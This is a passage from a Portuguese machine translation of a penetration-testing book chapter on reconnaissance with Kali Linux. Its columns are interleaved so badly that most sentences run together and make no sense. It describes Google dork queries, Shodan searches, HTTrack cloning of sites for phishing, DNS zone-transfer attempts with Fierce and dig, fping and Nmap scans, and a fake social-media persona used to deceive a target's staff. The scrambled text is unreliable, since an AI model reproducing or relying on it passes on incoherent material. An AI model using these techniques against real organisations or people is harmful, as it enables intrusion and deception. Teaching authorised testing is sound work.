modificado, ou levar a programao e entre vrios servios. O principal na natureza, ou seja, normalmente um desenvolvimento de outros controlar outros pequenos dispositivos argumento o de entender o que faz verificador da penetrao ou hacker programas. Engenharia reversa eletrnicos. um vai tentar aprender como tambm usado para Forense: Ferramentas forenses so Penetrao teste diferente de outros tanto quanto possvel sobre o anlise de malware para determinar o usados para monitorar e analisar o servios de segurana, como fazer ambiente de um alvo e caractersticas que faz um executvel ou por computador corretamente escopo do sistema antes do lanamento pesquisadores trfego de rede e aplicaes. um nvel de servio e melhor mtodo um ataque. Isto tambm conhecido para tentar encontrar vulnerabilidades Ferramentas de Relatrios: As para executar servios. Posicionando- como o estabelecimento de uma em aplicaes de software. ferramentas de relatrios so mtodos se o direito Pegada de um alvo. Reconhecimento para entregar informaes expectativas iniciais com um cliente normalmente passiva na natureza e encontradas potencial vai melhor qualificar a em muitos casos no ilegal (no durante um exerccio de penetrao. oportunidade entanto, no somos advogados e no podem oferecer saber como os dados especficos foi Polticas comerciais e de segurana A pesquisa inicial aconselhamento legal) para executar, obtida, e pedir referncias a recursos. do alvo: Como que o negcio Reconnaissance deve comear com a desde que voc no completar um Exemplos so o que as ferramentas funcionar? aprendizagem, tanto quanto possvel handshake de trs vias com um foram utilizadas para a obteno dos Onde esto os potenciais pontos sobre as pessoas e sistema no-autorizado. dados ou o que publicfacing fracos na operao? negcio associado ao alvo. Sun Tzu Exemplos de Reconnaissance incluir recursos, por exemplo, a consulta de O povo de alvo: Que tipo de pessoas creditado com a frase ", conhecer o qualquer coisa de pesquisar um alvo pesquisa especfica no Google que foi trabalham l? Como que eles podem seu no pblico submetido a tornar-se inimigo "no livro, A Arte da Guerra. fontes, como o Google, a atividade de obter os dados. Informar um cliente o seu trunfo para o ataque? Como um verificador da penetrao, monitoramento empregado para "voc obteve o objetivo" no bom o Definir metas: Quais so as menores voc precisa conhecer o seu aprender os padres de operao, suficiente, metas de frutas penduradas? O que alvo. Se o seu alvo passa a ser um e redes ou sistemas de varredura para porque a finalidade de um teste de deve site, voc deve olhar para todos os coletar informaes, tais como penetrao identificar fraqueza para ser evitado? aspectos do que fabricao reparos futuros. Rede da Target: Como as pessoas e site. Ele vai lhe dar uma melhor tipo, sistema operacional, e portas de os dispositivos se comunicam em compreenso de como o site comunicao abertas. Quanto mais Reconhecimento a rede? mantido e informaes Objetivos de reconhecimento Defesas do alvo: Que tipo de executar. Grande Reconnaissance pode ser recolhida sobre um alvo traz segurana est em vigor? Onde ela retorna mais vulnerabilidades uma melhor chance de identificar o est localizada? possveis. mais fcil e Tecnologias de alvo: Que tecnologias assustador a quantidade de mtodo mais rpido para alcanar so usadas para e-mail, rede informao est disponvel em fontes uma meta de penetrao, bem como trfego, armazenar informao, de pblicas. Temos encontrado melhor mtodo para evitar existente autenticao, e assim por diante? Eles o inimaginvel, como documentos segurana. Alm disso, alertando um so vulnerveis? classificados, senhas, relatrios de alvo provavelmente ir causar Kali Linux contm um extenso vulnerabilidade, algumas avenidas de ataque para catlogo de ferramentas intitulado fotografia indesejvel e acesso a fechar Alvo de fundo: Qual o foco dos Coleta de Informaes cmeras de segurana. Muitos testes como uma reao preparao para negcios do alvo? especificados para os esforos de de penetrao um ataque. Slogan oficial da Kali diz Associados de alvo: Quem so os reconhecimento. Poderia encher um objetivos do projeto comear com isso melhor: parceiros de negcios, fornecedores e livro separado para cobrir todas as aproveitamento de informaes fora "O mais quieto voc se torna, mais clientes? ferramentas de fontes pblicas. Aqui esto alguns voc capaz de ouvir" O investimento da Target em e mtodos oferecidos para coleta de pontos de partida para a coleta de Servios de reconhecimento deve segurana: As polticas de segurana informaes. Este captulo se informaes a partir de fontes incluir documentao pesado, porque anunciado? O que concentrar em vrios pblicas. foram encontrados dados conscientizao de segurana da tpicos de reconhecimento de [34] pode ser relevante em um momento segurana de investimento em aplicaes web e relacionar as posterior, no exerccio de penetrao. potencial, e do usurio? melhores ferramentas encontradas no Captulo 2 Os clientes tambm vo querer Internet, bem como o oferecido pela Site da empresa Kali Linux. Existe uma grande quantidade de uma inteligncia pesquisador sobre o http://archive.org, Voc ver o Internet e em partes da regio do Caribe pode informaes valiosas que podem ser que um alvo espera no divulgar ao Archive Wayback Machine ser encontrada em www.arin.net. Voc obtidas no site do alvo. pblico. no meio da pgina, como mostra a pode reunir Listar a maioria dos sites corporativos Para ver o Robots.txt arquivo, imagem a seguir: informaes sobre um alvo, como sua equipe executiva, figuras pblicas encontrar o Robots.txt arquivo no [36] Lancope, como visto na imagem e membros de diretrio raiz de um alvo seguinte: recrutamento e recursos humanos site. Por exemplo, adicionando o Captulo 2 Registros Regionais da Internet (RIRs) contatos. Estes podem tornar-se alvos Robots.txt arquivo para Facebook Digite a URL que voc gostaria de [39] para outra pesquisa ficaria como mostrado navegar e ver se todos os arquivos esforos e ataques de engenharia na imagem seguinte: foram capturados. Reconhecimento social. [35] A histria do arquivo pode ser visto Eletrnico coleta de dados, anlise e Mais informaes valiosas podem ser aqui, como mostrado na imagem Retrieval (EDGAR) obtidas por olhar para o que as outras Reconhecimento seguinte: O banco de dados EDGAR contm empresas Fontes de histria Web [37] declaraes de registro, relatrios so listados como parceiros, anncios Existem verses arquivadas da peridicos, e outros de emprego atuais, informaes maioria dos sites pblicos disponveis Reconhecimento formas de informao sobre as comerciais e de segurana no fontes, como o Como um verificador da penetrao, empresas desde 1994. As empresas polticas. Reconhecimento de um Wayback Machine em archive.org. esta uma ferramenta valiosa, pois nos Estados Unidos da parceiro de alto valor pode ser to Informao de interesse podem ser no deixar provas de Amrica so obrigados por lei a importante quanto a encontrados em mais velhos Reconhecimento em seu alvo. Na apresentar, e todas as informaes alvo principal, porque os parceiros verso do site de um alvo, como verdade, o seu alvo nunca sequer esto disponveis ao pblico. O podem fornecer uma nova fonte para organogramas desatualizados, tocou usando este duas seguintes imagens mostram a obteno de nmeros de telefone, ferramenta. Toda a informao foi documentos pblicos encontrados inteligncia. Um exemplo inteligncia do cliente, sistemas de arquivada em linha no Wayback durante a pesquisa Lancope: comprometer um recurso contratado informao listada nos campos, tais Machine. O [40] que gerencia como ver fonte ou duas prximas imagens mostram o helpdesk na sede do alvo. / Robots.txt, Parcerias de negcios www.lancope.com em 2002 em Captulo 2 O Robots.txt arquivo est disponvel e mais velhos, vulnerabilidades comparao a 2013: Recursos de mdia social encontrado em sites publicamente que corrigidas em verses posteriores, [38] A mdia social est em toda parte, e d e outros dados teis, o alvo no quer na maioria dos casos, acessvel ao instrues para os robs web na verso de site atual. Captulo 2 pblico. A maioria das pessoas tem (tambm conhecido como o importante entender que a informao RIR uma organizao que gerencia um Facebook, LinkedIn, blogs, ou mecanismo de busca), sobre o que publicamente disponvel difcil de a alocao de recursos e registro de outras formas de contas nuvem e no visvel usando o Robots remover IP contendo valioso Exclusion Protocol. O Disallow: / completamente, fazendo com que as dentro de uma regio especfica do informaes. Esta informao pode afirmao fontes histricas de um lugar valioso mundo. H cinco principais RIRs: a ser usada como um meio de diz um navegador no visitar uma para a pesquisa de reconhecimento. EUA, Canad, inteligncia engenharia social fonte, no entanto, uma Disallow pode Para acessar o Wayback Machine, ser ignorado, dando abrir o navegador web e navegue at de pessoal atual ou anterior de um para uma Carne sistema projetado tipicamente ansioso para compartilhar um edifcio pblico. Fontes de alvo. Um exemplo a pesquisa para comprometer navegadores de informaes com um novo potencial mapeamento on-line, como o Google Glassdoor.com para Internet mais vulnerveis (com carne de aluguer, o que pode ser usado Maps pode ajudar a identificar identificar os funcionrios anteriores bovina como onde a segurana fsica que esto descontentes, com base no coberto mais tarde neste livro), e uma avenida a informao implementada, e as tendncias sobre feedback. informaes confidenciais capturado a privilegiada. Um exemplo alvo de um a forma como as pessoas se H muitas pessoas que encontram os partir comprometida anncio de emprego para um Orculo deslocam de e para recursos da web como Maltego sistemas. Ns fomos capazes de desenvolvedor para entender o a partir do alvo. Outras reas de (encontrado em Kali Linux) mapear toda a organizao, obter hardware, verso do Oracle, os nomes interesse so a identificao de onde que pode pentear meios populares informaes sobre a rede, dos existentes e um verificador da penetrao sociais, registros pblicos, e sites de e ainda teve hardware embarcado administradores anteriores, as poderia acampar para procurar redes recrutamento de trabalho para para ns sem o nmero de e-mail ou questes existentes de operao, sem fio, e os possveis mtodos para impresso digital de um indivduo com telefone interno. falhas de segurana e mtodos para derivao base em informao limitada, como Nossa pessoa falsa, Emily Williams acesso, como perguntar "pode controles de acesso, tais como trajes um primeiro e ltimo nome. no real, ofertas de emprego ainda administradores trabalhar em casa, e e emblemas usados para obter acesso Um pesquisador pode coletar recebeu, foi fornecido dentro como eles acessam fsico. informaes como em todos os informao e acesso a eventos os sistemas? " Shodan lugares um indivduo vive, organizados pelo alvo. Informao [41] Shodan um motor de busca que feito negcios, pessoas com as quais poder, e pode identificar um dispositivo eles se socializar, interesses as pessoas vo dar a um solicitador Reconhecimento especfico, como o computador, especiais, esporte favorito que parece que eles podem ser Outra via de avaliar o salrio de um router, um servidor, usando uma equipes, e outros dados teis para confiveis. trabalho esperado, benefcios e taxa variedade de filtros, tais como os futuros ataques de pesquisa e Mais informaes sobre este projeto de rotatividade no metadados de faixas do sistema. engenharia social. podem ser encontradas em: placas do trabalho populares. Estas Por exemplo, voc pode procurar por Confiana http://www.thesecurityblogger.com/?p= tendncias podem descobrir novos um sistema especfico, como um A maioria das pessoas so 1903 vetores de ataque. Glassdoor. Cisco 3850, correndo naturalmente confiante e assumir Postagens de emprego com um exemplo de uma fonte uma verso do software, tais como informaes publicadas em fontes Postagens de emprego contm uma popular para este tipo de dados. IOS verso 15.0 (1) EX. pblicas riqueza de conhecimentos sobre o Localizao [42] real. Para testar este conceito, os ambiente de um alvo. Anncios de O investimento em segurana autores deste livro criou uma falsa emprego ciberntica para um alvo geralmente Captulo 2 pessoa atravs sociais pode fornecer mais detalhes sobre pode ser determinado com base em O exemplo a seguir um caso de uso mdia e fingiu ser uma nova que tipo de sistemas so instalados, o nvel de segurana fsica. Seria de em busca de qualquer sistema contratao para uma empresa-alvo. que os administra, como supor um edifcio com cercas e SCADA com pblico A pessoa seria falso grande o pessoal , e nvel de armado Acesso Internet, o que, em teoria, se tornar amigos com os associados habilidade dos funcionrios. guardas teria um investimento maior no deveria existir no entanto, pode de nossa meta, carto postal de frias Representantes de Recursos em segurana ciberntica do que um mostrar Shodan falsos que esto ligados Humanos so alvo localizado dentro isto no necessariamente verdade. Google Hacking Banco de Dados mudou de computadores no Coisas de controle sistemas SCADA, Captulo 2 autorizados. No entanto, neste caso, como gerenciamento de energia Algumas consultas exemplo da Reconhecimento os administradores da esquerda e tratamento de gua, de modo que a pesquisa so os seguintes: Para acessar o GHDB, navegue at assistente padro rodando sem identificao de sistemas acessveis http://www.exploit-db.com/google- nenhuma configurao. pblicas extremamente ruim! dorks/. Quando clicamos no primeiro link, [43] Voc vai ver as ltimas pesquisas temos a tela inicial para configurar o Identifica documentos sensveis: GHDB listados na pgina web. Voc software. Reconhecimento intext: classificadas secreto pode clicar em qualquer O GHDB essencialmente transforma o Google hackers Identifica Linksys GUIs de da pesquisa questiona a si mesmo. Google em um scanner de aplicaes Google hacking a forma mais gerenciamento de cmera (cuidado: Voc vai encontrar diferentes web limitado para um comum de motor de busca de voc pode no gostar categorias de pesquisas na parte Verificador da penetrao. Neste reconhecimento de web o que voc encontrar): inurl: main.cgi inferior da pgina que tem caso, um bom software que pode aplicaes. Google Hacking usa Identifica Nessus relatrios para foi salvo. No exemplo a seguir, aumentar a segurana pode agora operaes avanadas no motor de encontrar sistemas vulnerveis: inurl: desloque-se para a categoria Arquivos potencialmente ser usado contra um busca Google NESSUSXXXXXXXX Vulnervel servidor web por um invasor. para localizar seqncias especficas Para mais informaes sobre Google e selecione a consulta Assistente Pesquisando redes de texto dentro de resultados de hacking, confira um bom livro Carregador ionCube. Muitas pessoas no entendem o pesquisa. Filtros de pesquisa pode se intitulado Google [46] verdadeiro propsito de pesquisar a concentrar em Hacking para testadores de rede de um verses especficas de aplicaes penetrao por Johnny Long, bem Captulo 2 alvo antes de lanar um ataque. web vulnerveis, tais como como o seu website em http:// Podemos selecionar a consulta de Amadores Penetrao Testers Desenvolvido por Apache no johnny.ihackstuff.com. pesquisa, e vai trazer-nos para o compreender a necessidade intitle: "index of" operador ou O Google Hacking Banco de Dados Google, a realizao do para escolher um alvo antes que eles identificar arquivos de log como (GHDB) criado por Johnny Long de mesma consulta de pesquisa. possam realizar um teste de ws_ftp.log, Contendo Hackers Para [47] penetrao. Depois de tudo, um informaes de IP sensvel. A seguir Caridade Penetrao alguns screenshots demonstrar (http://www.hackersforcharity.org/), a Reconhecimento Tester precisa de um lugar em que usando um Google fonte definitiva para o Google O exemplo anterior mostra Google para apontar o seu arsenal de procurar Linksys para encontrar consultas de pesquisa. Procura por encontrou alguns resultados. O ferramentas. Muitos amadores cmeras Linksys publicamente nomes de usurio, senhas, sistemas ionCube Carregadeira vontade disponveis. A primeira imagem vulnerveis e exploits , aparentemente, no configurado ou executar o Nmap, varreduras de ping, mostra o comando de pesquisa foram capturados e categorizados por mal configurado. O ionCube ou outras ferramentas ruidosas para seguido de alguns exemplos de aficionados de hackers do Google. Os Carregadeira , na verdade, um determinar o que esto disponveis resultados de emisso da pesquisa. aficionados grande pedao de software que alvos A ltima imagem mostra um avano que categorizou as buscas do Google protege o software escrito em PHP de perturbando o ambiente, o que mais de cmera que poderia ser encontrado so afetuosamente conhecido como serem visualizados ou tarde produz resultados pobres. usando esta tcnica. idiotas do Google. [44] [45] Reconhecimento de rede sobre a Reconhecimento. Outras ferramentas imagem mostra um diretrio criado imagem mostra *para todos os seleo de um alvo. A segurana da podem estar disponveis para nomeado mywebsites usando o mkdir arquivos). Voc tambm pode definir rede experiente aplicaes web ou comando. as opes de linha de comando profissional ir dizer-lhe boa diferentes tipos de destino no entanto, Para iniciar HTTrack, tipo httrack na ou bandeiras voc pode querer definir. Reconnaissance sobre a seleo de o foco deste captulo permitir que janela de comando e dar ao projeto O exemplo na imagem seguinte uma meta de qualidade, um um nome, como mostrado na imagem mostra nenhum passar a maior parte do seu tempo a leitor para avaliar alvos baseados em seguinte: opes adicionais. ver, em vez de agir. O primeiro passo aplicativos web. O prximo passo selecionar um Antes httrack executado, ele ir de HTTrack - clonar um site diretrio para salvar o site. O exemplo mostrar o comando que est sendo cada teste de penetrao HTTrack uma ferramenta construda na executado. Voc pode usar este precisamente encontrar e selecionar em Kali. O objetivo do HTTrack imagem seguinte mostra a pasta comando no futuro, se voc deseja as metas de qualidade. copiar um site. criada no passo anterior / Root / executar httrack sem passar pelo [48] Ela permite que um verificador da mywebsites, Usado para o diretrio: assistente penetrao de olhar para todo o Digite a URL do site que voc deseja novamente. As duas imagens Captulo 2 contedo de um site, todas as suas capturar. O exemplo a seguir seguintes mostram hhtrack clonagem Do ponto de vista do cliente, pginas, imagem mostra www.drchaos.com. www.drchaos.com: Penetrao Testers vai encontrar e os arquivos off-line, e em seu Isso pode ser qualquer site. A maioria [51] indivduos prprio ambiente controlado. Alm dos ataques que a satisfao do ganho em parar disso, vamos usar usar um site acessado por clientes de Reconhecimento testadores de penetrao de provar o HTTrack para ataques de engenharia seu alvo, como social popular Depois de terminar a clonagem do seu valor social em captulos posteriores. Ter sites de mdia ou sites internos do site, navegue at o diretrio onde voc como empregados, bem como a forma uma cpia de um site alvo. salvou. L dentro, voc vai encontrar como ela est bem preparada para pode ser usado para desenvolver sites As prximas duas opes so todos os seus arquivos e pginas da ataques cibernticos. Ele phishing falsos, os quais podem ser apresentadas sobre o que voc quer web, como mostra a altamente recomendvel que um incorporados em outros fazer com o tela a seguir: verificador da penetrao profissional Conjuntos de ferramentas de teste de local capturado. Opo 2 o mtodo Agora voc est pronto para pesquisar no penetrao. mais fcil, que um stio de espelho o site do seu alvo e, eventualmente, entrar em conflito com o pessoal do Para usar o HTTrack, abra um com construir uma cliente, enquanto os servios de Terminal janela e digite apt-get install um assistente, como mostrado na ferramenta de penetrao penetrao esto sendo httrack imagem seguinte: personalizado ou explorar o acesso do realizada. Um verificador da como mostrado na figura a seguir. [50] usurio a um site clonado. penetrao deve se concentrar em Algumas verses de Kali no tem este O sibilo e traceroute comandos so conscincia da segurana, built-in. Captulo 2 boas maneiras de descobrir e revelar o que vulnerabilidades [49] Em seguida, voc pode especificar se informaes bsicas existem com o mnimo de interao voc quiser usar um proxy para iniciar sobre o seu destino. Quando a com o pessoal do alvo durante um Reconhecimento o ataque. Voc tambm pode informao viaja atravs de redes, ele compromisso de servio. Voc vai querer criar um diretrio para especificar o tipo de arquivos que no costuma ir A seguir, so as melhores ferramentas armazenar seu site copiado. A voc deseja fazer o download (o disponveis no Kali para aplicao web sequncia exemplo a seguir diretamente da origem para o destino. Uma varredura ICMP envia verificar em um host de cada vez. O google.com. Geralmente atravessa vrios simplesmente fora uma solicitao de fping comando permitir que voc Tcnicas de reconhecimento DNS sistemas, tais eco e procura por uma resposta. Se a pingue mltipla [53] como roteadores, firewalls e outros resposta hosts com um nico comando. Ele sistemas de computador antes que ele retornado, ento, como um tambm ir permitir que voc leia um Reconhecimento chegue ao seu destino. verificador da penetrao, voc sabe arquivo com mltiplas Informaes de DNS sobre um alvo O traceroute comando identifica cada que h um possvel alvo. O nomes de host ou endereos IP e em particular pode ser extremamente sistema os dados viajam atravs de, problema com varreduras ICMP ICMP envi-los usando requisies ICMP til para uma penetrao juntamente com que normalmente bloqueado pela pacotes. Tester. DNS permite que um o tempo que leva para que os dados maioria dos firewalls. Que Para usar o fping comando para verificador da penetrao para mapear para se deslocar entre os sistemas. A significa qualquer scans de fora indo executar uma varredura ICMP em sistemas e subdomnios. Mais velho ferramenta instalada em cada para uma rede de destino interno ser uma rede, emitir o Ataques DNS transferir um arquivo de sistema operacional moderno. Para a bloqueada pelo seguinte comando: zona de um DNS autoritrio, maioria dos alvos de alto valor, o sibilo um scanner de ICMP. pedaos de rede / host Fping-asg permitindo que o testador e traceroute O sibilo comando a forma mais fping-asg 10.0.1.0/24 examinar o contedo completo do comandos provavelmente ser bsica para iniciar uma varredura Embora o umabandeira ir retornar os arquivo de zona para identificar alvos desativada, e uso excessivo destes ICMP. Basta digitar resultados atravs do endereo IP de potenciais. Infelizmente, servios em sibilo seguido por um nome de hosts ao vivo s, o sbandeira maioria dos servidores DNS atuais a maioria dos alertas de disparo host ou endereo IP para ver o que vai exibe estatsticas sobre a no permitem transferncias de zona provveis sobre os sistemas de responder ao ICMP digitalizao, o gconjuntos de no autenticado. No entanto, todos segurana de rede. Muitos firewalls ou echo pedido. A figura a seguir mostra bandeira fping no modo bastante, o no est perdido! DNS por sua prpria outros um ping www.google.com: que significa que natureza um servio que responde a criao de sistemas que no Tcnicas de reconhecimento de ICMP faz mostrar ao usurio o status de consultas e, portanto, responder s rotas nmero B24RYE. [52] cada varredura, apenas o resumo, um invasor pode usar uma consulta de Se os sistemas no respondem quando se completou. lista de palavras que contm centenas para traceroute, Usando isso tambm Captulo 2 O Nmap fornece resultados de nomes com DNS excessivamente pode desencadear Se voc receber qualquer resposta de semelhantes, como o fping comando. servidor. Este vetor de ataque uma eventos de segurana. Estas volta, voc vai saber que o seu A maioria dos alvos de alto valor tem tarefa extremamente demorada, no ferramentas so anfitrio est vivo. Se voc receber um nome DNS associado a uma entanto, a maioria barulhento, e quando usados qualquer aplicao. DNS aspectos pode ser automatizado. indiscriminadamente, eles vo tempos de espera, o seu pedido ICMP nomes de torn-lo mais fcil para que Escavao (Domnio informaes disparar alarmes e logs. Se o seu est sendo bloqueado, ou nenhum os usurios acessem um determinado groper) um DNS mais popular e objetivo host de destino recebeu servio e adicionar uma camada de amplamente utilizado est a ser furtivo, voc tem apenas seu pedido. profissionalismo ao seu sistema. Por Ferramentas de reconhecimento. Ele sido derrotada, dando o seu alvo a O problema com o sibilo comando exemplo, se voc quiser acessar o consulta os servidores DNS. Para usar oportunidade de que ele s permite a utilizao de Google para Dig, abrir um prompt de comando configurar e implementar ICMP para informaes, voc poderia abrir um e tipo cavar e hostname, em que contramedidas contra o seu teste de navegador e digitar 74.125.227.101 ou hostname representa o domnio de penetrao. tipo www. destino. Escavao ir utilizar os seus sistemas alvos potencialmente alto valor. fierce.pl-dns thesecurityblogger.com Maltego uma ferramenta de operacionais configuraes de DNS Antes de comear a escolher [56] reconhecimento incorporada Kali padro para consultar o nome do host. aleatoriamente anfitries, devemos desenvolvido por Paterva. um Voc tambm pode configurar Dig consultar o servidor DNS para ver Captulo 2 ferramenta Reconnaissance multiuso para consultar servidores DNS que existem entradas. A melhor O domnio thesecurityblogger.com, que pode reunir informaes usando personalizado, adicionando @ <IP> ao maneira de fazer isso perguntar o Mostrado na imagem anterior, tem aberto e comando. O exemplo na imagem a servidor DNS para nos dizer. Se o alguns servidores associados. Ns informao pblica na Internet. Tem seguir ilustra usando Dig em Servidor DNS est configurado para realizamos nossa tarefa. No entanto, alguns embutido Reconnaissance www.cloudcentrics.com. permitir transferncias de zona, que voc pode DNS, mas [54] vai nos dar uma cpia de todas as ver Fierce fracassada de completar muito mais profundo em suas entradas. uma transferncia de zona. Fierce vai fingerprinting seu alvo e recolha de Captulo 2 [55] tentar a fora bruta de uma zona informaes sobre O -T opo Dig vai delegar uma zona transferir usando uma lista de palavras los. Leva as informaes e exibe os DNS para usar o nome de autoridade Reconhecimento ou arquivo de dicionrio, se tiver um resultados em um grfico para anlise. servidores. Ns digite dig-t ns Kali navios com uma ferramenta definido. Ns no o fez, Para iniciar Maltego, navegue at cloudcentrics.com no exemplo da chamada Fierce. Fierce ir verificar porque o objetivo desta seo Aplicao Menu em Kali, e clique no tela a seguir: para ver se o servidor DNS permite determinar o que existe anfitries no Barrilha menu. Vemos a partir dos resultados que transferncias de zona. Se so domnio, no Em seguida, selecione Coleta de temos dois servidores DNS permitidas transferncias de zona, necessariamente neste momento Informaes |Anlise DNS |Maltego. autorizados para o domnio Fierce ir executar uma transferncia realizar um ataque de transferncia de O primeiro passo ao iniciar Maltego www.cloudcentrics.com, Pois eles so de zona e zona. No entanto, se o seu objetivo registr-lo. Voc no pode usar o ns3681.hostgator.com e ns3682. informar o usurio sobre as entradas. mais abrangente do que a aplicao sem registro. hostgator.com. Se o servidor DNS no permite segmentao de aplicaes web, voc [57] Parabns, voc acaba de encontrar o transferncias de zona, Fierce pode querer explorar mais este servidor DNS autorizado para o seu pode ser configurado para nomes de em seu prprio pas. Reconhecimento alvo de DNS. host de fora bruta em um servidor Agora podemos atingir um Quando voc completar o registro, Identificao do alvo DNS DNS. Fierce concebido como determinado host e usar ferramentas voc vai ser capaz de instalar e Agora que voc j encontrou os uma ferramenta de reconhecimento como o Nmap para prosseguir em comear a usar Maltego servidores DNS autoritativos para um antes de usar uma ferramenta que mapeando o nosso alvo. Um aspecto da aplicao. domnio, voc pode requer que voc sabe os endereos importante do uso Fierce est Maltego tem vrios mtodos de coleta quero ver o que anfitries tm IP, selecionando um alvo de informaes. A melhor maneira de entradas sobre esse domnio. Por como o nmap. usando muito pouco trfego de rede, o usar exemplo, o domnio Para usar Fierce, navegue at Coleta que importante para evitar a Maltego aproveitar o assistente de drchaos.com pode ter vrios hosts. tal de Informaes |Anlise DNS |Fierce. deteco. Iremos inicializao para selecionar o tipo de como cloud.drchaos.com,correio. Fierce ser carregado em uma janela usar o Nmap para reunir mais informao drchaos. de terminal, como mostrado na informaes sobre o nosso alvo mais que pretende reunir. Os usurios com,sharepoint.drchaos.com. Todos imagem seguinte. adiante neste captulo. experientes pode querer comear com estes podem ser potenciais aplicaes Para executar o Feroz script, digite o Grficos de coleta de informaes - um grfico em branco ou pular e seguinte comando: Maltego o assistente todos juntos. O poder de uma rede. Nmap tem recursos Para abrir Zenmap, ir para o Backtrack reflexo pode ser a de excluir perfis Maltego que ele permite que voc avanados que podem detectar menu. Navegue at Mapeamento de postar execuo. Aqui est uma observar visualmente o diferentes aplicaes Informaes | palavra de conselho: perfis relao entre um domnio, rodando em sistemas, bem como Anlise DNS, e lanamento Zenmap. no tomar qualquer espao e vir a organizao e pessoas. Voc pode se servios e recursos de impresso Voc vai notar sob o Perfil menu que calhar quando voc quer recriar algo. concentrar em torno de um digital OS. um existem vrias opes para determinar Ns organizao especfica, ou olhar para dos scanners mais utilizados rede que tipo de verificao que gostaria de recomendar sendo extremamente uma organizao e suas parcerias tornando-se muito eficaz, mas executar, como mostrado na imagem descritivo em nomes de perfil e chegar relacionados de tambm muito seguinte: a um Consultas DNS. detectvel. Recomendamos o uso do [60] mtodo de nomeao padro. Eu Dependendo das opes de Nmap em situaes muito especficas comeo toda a minha descrio de digitalizao escolhido, Maltego para Captulo 2 perfil com a data, hora, permitir que voc execute o evitar disparar os sistemas de defesa O primeiro passo criar um novo descrio da minha posio, a minha seguintes tarefas: de um alvo. perfil. Um perfil em Zenmap permite rede local alvo de verificao e nome Para mais informaes sobre como uma penetrao do cliente. usar o Nmap, consulte Tester para criar o tipo de verificao [61] http://nmap.org/. para executar e que opes diferentes Alm disso, Kali vem carregado com para incluir. Reconhecimento Associar um endereo de e-mail para Zenmap. Zenmap d Nmap uma Navegue at a Perfil menu e selecione Ao concluir a sua descrio, clique no uma pessoa grfica Novo perfil ou Command para criar um Digitalizao guia. No Alvos seo, Sites associados a uma pessoa interface com o usurio (GUI) para novo voc vai adicionar o que os hosts ou Verifique o endereo de e-mail executar comandos. Embora existam perfil, como mostrado na imagem redes que voc gostaria de digitalizar. Rena detalhes do Twitter, incluindo muitos puristas que vontade seguinte: Este campo pode assumir geolocalizao de fotos dizer-lhe a verso de linha de Quando voc seleciona Novo perfil ou uma gama de endereos IP (10.0.1.1- [58] comando a melhor verso por causa de comando, o editor de perfis ser 255) ou pode ter uma rede em formato de sua velocidade e iniciado. Voc ir CIDR Captulo 2 flexibilidade, Zenmap j percorreu um precisa dar o seu perfil de um nome (10.0.1.0/24). A maioria dos recursos so auto- longo caminho e incorporou a maior descritivo. Por exemplo, voc pode Voc pode ver a opo -A explicativos e incluem como eles so parte do Nmap ligar para o perfil Meu selecionada por padro para permitir a usados sob a recursos. Zenmap tambm oferece First Scan ou qualquer outra coisa que digitalizao agressivo. Agressivo descrio caracterstica. Maltego recursos exclusivos no oferecidos no voc gostaria. digitalizao permitir a deteco de comumente utilizado para coletar Nmap, como Opcionalmente, voc pode dar o perfil SO (-O), deteco de verso (-SV), de informaes e, por vezes, desenvolvimento de representaes de uma descrio. Durante o curso de varredura de script (-SC) usado como o primeiro passo, durante grficas de um varrimento, que pode usar e traceroute (- traceroute). um ataque de engenharia social. ser usado mais tarde por outra Zenmap voc provavelmente ir criar Essencialmente, a digitalizao Nmap sistemas de informao. muitos perfis e fazer vrios exames. A agressivo permite ao usurio ligar Nmap significa Network Mapper, e [59] natural vrios sinalizadores, sem a usado para fazer a varredura de hosts necessidade de ter que se lembrar e servios na Reconhecimento deles. Varredura agressivo considerado a varredura consideravelmente mais Embora haja muitas maneiras de obter intrusivo, o que significa que ser longo, o -Pn flag permite Nmap para Captulo 2 sadas de Nmap (por exemplo, os detectado pela maioria evitar um comum Se voc olhar para a janela de autores dispositivos de segurana. Uma problema de no receber uma digitalizao, voc no s vai ver neste livro preferem as tcnicas de varredura agressivo pode passar resposta de ping, quando os pedidos quais portas esto abertas em linha de comando), inclumos esta despercebida se o seu alvo um de ping so bloqueados por especfico tcnica extremamente especfico de defesas de segurana. exrcitos, mas tambm o que as porque ele constantemente acolhimento, mas, independentemente Salve as alteraes feitas clicando no aplicaes esto em execuo nesses referenciado em muitos padres de da situao, recomendado que voc Salvar alteraes boto no canto hosts. Observe que o Nmap pode penetrao da web e um ter a permisso para fazer a varredura inferior direito determinar as coisas, como um forma comum para as pessoas a us- antes de usar este ou opo de canto. Uma vez salvo, selecione o servidor est executando o IIS 5.0 lo. digitalizao. Como um lembrete, Digitalizao boto no lado superior como um servidor web atravs da Alm disso, vrios lugares em GUI completar o ACK no handshake de direito da tela porta 80. O para Zenmap permitem ao usurio trs vias com um sistema no para iniciar a digitalizao. Observe as Resultados de pesquisa ir produzir o exportar grficos e autorizado suas opes e alvo que voc endereo IP do servidor, o sistema certas partes do relatrio em arquivos considerado ilegal pelos padres configurou no perfil operacional do servidor CSV ou arquivos de imagem. Essas norte-americanos. editor so listados. execuo, bem como as aplicaes exportaes so extremamente Podemos usar as informaes que A rede Topologia guia vai lhe dar uma web em execuo no host. Testadores valioso na criao de relatrios. recebemos de nosso exerccio rpida olhada em como a digitalizao de penetrao vai FOCA - site metadados Reconnaissance DNS para no alvo encontrar esses resultados valiosos Reconnaissance visar uma srie muito especfica. rede foi concluda, e se voc tivesse quando eles esto procura de Voc sabia toda vez que voc criar um Antes de fazer isso, vamos definir que atravessar roteadores. Neste exploits contra este host. documento, como um PowerPoint algumas opes comuns em primeiro exemplo, voc v . Microsoft lugar. a verificao permaneceu local para a Agora possvel para que voc possa apresentao, documento do [62] rede. concentrar seus esforos na meta de Microsoft Word ou PDF, metadados [63] correr web deixado no documento? Captulo 2 servios ou a porta 80, porque [66] Clique no Sibilo guia. Selecione o -Pn Reconhecimento aberto. opo bandeira to Nmap no ping no O Hosts guia vai dar uma lista dos Zenmap a melhor maneira para Captulo 2 host primeiro. hosts descobertos. obter uma sada de scans do Nmap. O que so metadados? Metadados Quando este sinalizador no estiver Quando um host selecionada, Zenmap oferece uma rica so dados sobre dados. a definido, o Nmap ir pingar seus hosts Zenmap ir exibir uma lista detalhada interface grfica do usurio que exibe informao descritiva sobre de destino e redes. Omisso dos Exrcitos, seu exames que podem ser exportados um determinado conjunto de dados, definies s executar scans em hosts sistemas operacionais e servios em diferentes objeto ou de recursos, incluindo a que so considerados vivos ou comuns. Na tela seguinte, voc pode formatos, como texto ou Microsoft forma como ele formatado, bem acessvel. A-Pn ver um dos nossos 